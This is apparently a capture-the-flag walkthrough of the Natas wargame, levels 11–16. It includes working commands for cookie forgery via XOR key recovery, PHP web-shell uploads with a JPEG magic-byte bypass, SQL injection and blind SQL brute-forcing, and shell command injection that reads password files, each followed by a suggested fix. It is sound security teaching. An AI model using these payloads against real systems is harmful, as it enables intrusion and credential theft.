# Natas wargame: Level 11 to 16


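Level 11

The `data` cookie holds the page settings as JSON, XORed with a repeating key and base64-encoded. The plaintext for the default settings is known, so XORing it with the cookie value recovers the key (`qw8J` below). Nothing authenticates the cookie, so a re-encoded value with `showpassword` set to `yes` is accepted. Keeping this state server-side, or protecting the cookie with an HMAC, would prevent both steps.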

# wget --quiet -O - --user=natas11 --password=SUIRtXqbB3tWzTOgTAX2t8UfMbYKrgp6 --post-data "submit=&bgcolor=#ffffff" --keep-session-cookies --save-cookies natas11.cookie http://natas11.natas.labs.overthewire.org
# cat xor_encrypt
#!/usr/bin/php
<?php
// Key-recovery helper for the level 11 cookie. Despite the file name it does
// not encrypt anything: XOR is its own inverse, so XORing the cookie bytes
// with the plaintext they encode yields the key stream.
//
// Usage:  ./xor_encrypt <base64 cookie value>      (read from argv[1])
// Output: the raw XOR of the two inputs; a short repeating pattern in it is
//         the key.

// Known plaintext: assumed to be exactly what the server encodes for the
// default settings (showpassword=no, bgcolor=#ffffff).
$knownPlain = json_encode(array("showpassword"=>"no","bgcolor"=>"#ffffff"));
$knownLen = strlen($knownPlain);

$cipher = base64_decode($argv[1]);
$cipherLen = strlen($cipher);

$recovered = "";
$pos = 0;
while ($pos < $cipherLen) {
        // Wrap around the known plaintext if the cookie is longer than it.
        $recovered .= $cipher[$pos] ^ $knownPlain[$pos % $knownLen];
        $pos++;
}
echo $recovered;
?>
# grep natas natas11.cookie
natas11.natas.labs.overthewire.org      FALSE   /       FALSE   0       data    ClVLIh4ASCsCBE8lAxMacFMZV2hdVVotEhhUJQNVAmhSEV4sFxFeaAw%3D
# ./xor_encrypt ClVLIh4ASCsCBE8lAxMacFMZV2hdVVotEhhUJQNVAmhSEV4sFxFeaAw
qw8Jqw8Jqw8Jqw8Jqw8Jqw8Jqw8Jqw8Jqw8Jqw8Jq
# cat set_cookie
#!/usr/bin/php
<?php
// Builds a replacement value for the level 11 `data` cookie: the settings
// JSON with "showpassword" set to "yes", XORed with the repeating key and
// then base64-encoded.
//
// Usage:  ./set_cookie <key>      (read from argv[1])
// Output: the base64 string to place in the cookie.
//
// The transcript shows the server accepting this value, i.e. the cookie has
// no integrity check (MAC/signature) that a client-side edit would break.
// NOTE(review): an empty key makes the modulo below divide by zero.
$xorKey = $argv[1];
$keyLen = strlen($xorKey);

$payload = json_encode(array("showpassword"=>"yes","bgcolor"=>"#ffffff"));
$payloadLen = strlen($payload);

$masked = "";
for ($n = 0; $n < $payloadLen; ++$n) {
        // The key is shorter than the payload, so it is applied cyclically.
        $masked .= $payload[$n] ^ $xorKey[$n % $keyLen];
}
echo base64_encode($masked);
?>
# ./set_cookie qw8J
ClVLIh4ASCsCBE8lAxMacFMOXTlTWxooFhRXJh4FGnBTVF4sFxFeLFMK
# string=`./set_cookie qw8J`
# sed -i "s/data\t.*%3D/data\t$string/" natas11.cookie
# wget --quiet -O - --user=natas11 --password=SUIRtXqbB3tWzTOgTAX2t8UfMbYKrgp6 --post-data 'submit=&bgcolor=#ffffff' --load-cookies natas11.cookie --keep-session-cookies --save-cookies natas11.cookie http://natas11.natas.labs.overthewire.org | grep natas12 | awk '{print $6}' | cut -b -32
sh7DrWKtb8xw9PIMkh8OQsgno6iZnJQu
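Level 12

The upload request carries the target name in a client-controlled `filename` form field. The file ends up under `upload/` with a random name but apparently keeps the `.php` extension from that field, so the uploaded script runs when it is requested. The server should choose the extension itself and serve uploads from a location where scripts are not executed.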

# curl --silent --user natas12:sh7DrWKtb8xw9PIMkh8OQsgno6iZnJQu --request POST --header "Content-Type: multipart/form-data; boundary=#" --data $'--#\r\nContent-Disposition: form-data; name="MAX_FILE_SIZE"\r\n\r\n1000\r\n--#\r\nContent-Disposition: form-data; name="filename"\r\n\r\nfuckyou.php\r\n--#\r\nContent-Disposition: form-data; name="uploadedfile"; filename="fuckyou.php"\r\nContent-Type: application/x-php\r\n\r\n<?php readfile("/etc/natas_webpass/natas13");?>\r\n--#--\r\n\r\n' http://natas12.natas.labs.overthewire.org | grep upload | awk -F\" '{print $2}'
upload/oijrt0cyhv.php
# curl --silent --user natas12:sh7DrWKtb8xw9PIMkh8OQsgno6iZnJQu http://natas12.natas.labs.overthewire.org/upload/oijrt0cyhv.php
IGCXqS4x472aoHZYaidvmeoWj2GmuRYz
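Level 13

Same upload as level 12, except that the file body now starts with the bytes `ff d8 ff` (the JPEG signature), which appears to be enough to pass the server's image check. The `cut -b 4-` in the second command strips those three bytes from the response. Checking only a file's leading bytes does not make it safe to store under an executable extension.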

# curl --silent --user natas13:IGCXqS4x472aoHZYaidvmeoWj2GmuRYz --request POST --header "Content-Type: multipart/form-data; boundary=#" --data $'--#\r\nContent-Disposition: form-data; name="MAX_FILE_SIZE"\r\n\r\n1000\r\n--#\r\nContent-Disposition: form-data; name="filename"\r\n\r\nfuckyou.php\r\n--#\r\nContent-Disposition: form-data; name="uploadedfile"; filename="fuckyou.php"\r\nContent-Type: image/jpg\r\n\r\n'"`echo -n "ffd8ff" | xxd -p -r`"$'<?php readfile("/etc/natas_webpass/natas14");?>\r\n--#--\r\n\r\n' http://natas13.natas.labs.overthewire.org | grep upload | awk -F\" '{print $2}'
upload/pmg8woiyek.php
# curl --silent --user natas13:IGCXqS4x472aoHZYaidvmeoWj2GmuRYz http://natas13.natas.labs.overthewire.org/upload/pmg8woiyek.php | cut -b 4-
sSkCeug1bdrYejzAaBhgwI3qJXDKqlgh
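Level 14

The `username` value closes the quoted string in what is presumably the login query and appends `or true`. The trailing `#` comments out the rest, so the check succeeds without a valid password. Parameterized queries (prepared statements) remove this injection point.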

# curl --silent --user natas14:sSkCeug1bdrYejzAaBhgwI3qJXDKqlgh --request POST --data "username=\"or true#" http://natas14.natas.labs.overthewire.org | grep natas15 | awk '{print $8}' | cut -b -32
m2azll7JH6HS8Ay3SOjG3AGGlDGTJSTV
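Level 15

The page only reports whether a user exists, so that answer is used as a yes/no oracle (boolean-based blind SQL injection). The first loop finds the password length; the second compares each character's ASCII code against 33–126, one position at a time. As in level 14, a parameterized query is the fix. The run issues up to 94 requests per character, a volume that stands out in access logs.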

# j=1; while [ true ]; do result=`curl --silent --user natas15:m2azll7JH6HS8Ay3SOjG3AGGlDGTJSTV --request POST --data "username=natas16\" and length(password)=$j#" http://natas15.natas.labs.overthewire.org | grep "This user exists"` ; if [ "$result" != "" ]; then echo $j; break; fi; j=$[$j+1]; done
32
# for i in `seq $j`; do for k in `seq 33 126`; do result=`curl --silent --user natas15:m2azll7JH6HS8Ay3SOjG3AGGlDGTJSTV --request POST --data "username=natas16\" and ascii(substr((select password),$i,1))=$k#" http://natas15.natas.labs.overthewire.org | grep "This user exists"` ; if [ "$result" != "" ]; then echo "obase=16;ibase=10;$k" | bc -l | xxd -p -r ; break; fi; done; done; echo
3VfCzgaWjEAcmCQphiEPoXi9HtlmVr3L
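Level 16

The `needle` value is a `$( … )` command substitution that a shell on the server evaluates. Its output is not shown by the page, so it is redirected to `/tmp/natas17` and read back through the level 9 page, which accepts `;`-separated commands in the same field. User input should not reach a shell command line at all; where it must, it should be passed as a single escaped argument.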

# wget --quiet -O - --user=natas16 --password=3VfCzgaWjEAcmCQphiEPoXi9HtlmVr3L --post-data 'submit=&needle=$(cat /etc/natas_webpass/natas17 > /tmp/natas17)' http://natas16.natas.labs.overthewire.org > /dev/null
# wget --quiet -O - --user=natas9 --password=sQ6DKR8ICwqDMTd48lQlJfbF1q9B3edT --post-data 'submit=&needle=;cat /tmp/natas17;' http://natas9.natas.labs.overthewire.org | grep -v -e ^$ -e ^\< | tail -n 1
9HBzt5ljtPAgmaYvNfZ8chZVq50oepsx




1 comment:

handshake said...

Man, this is classic! I fell in love with the pure minimal beauty of the solution of Level 16. Charm! Respect!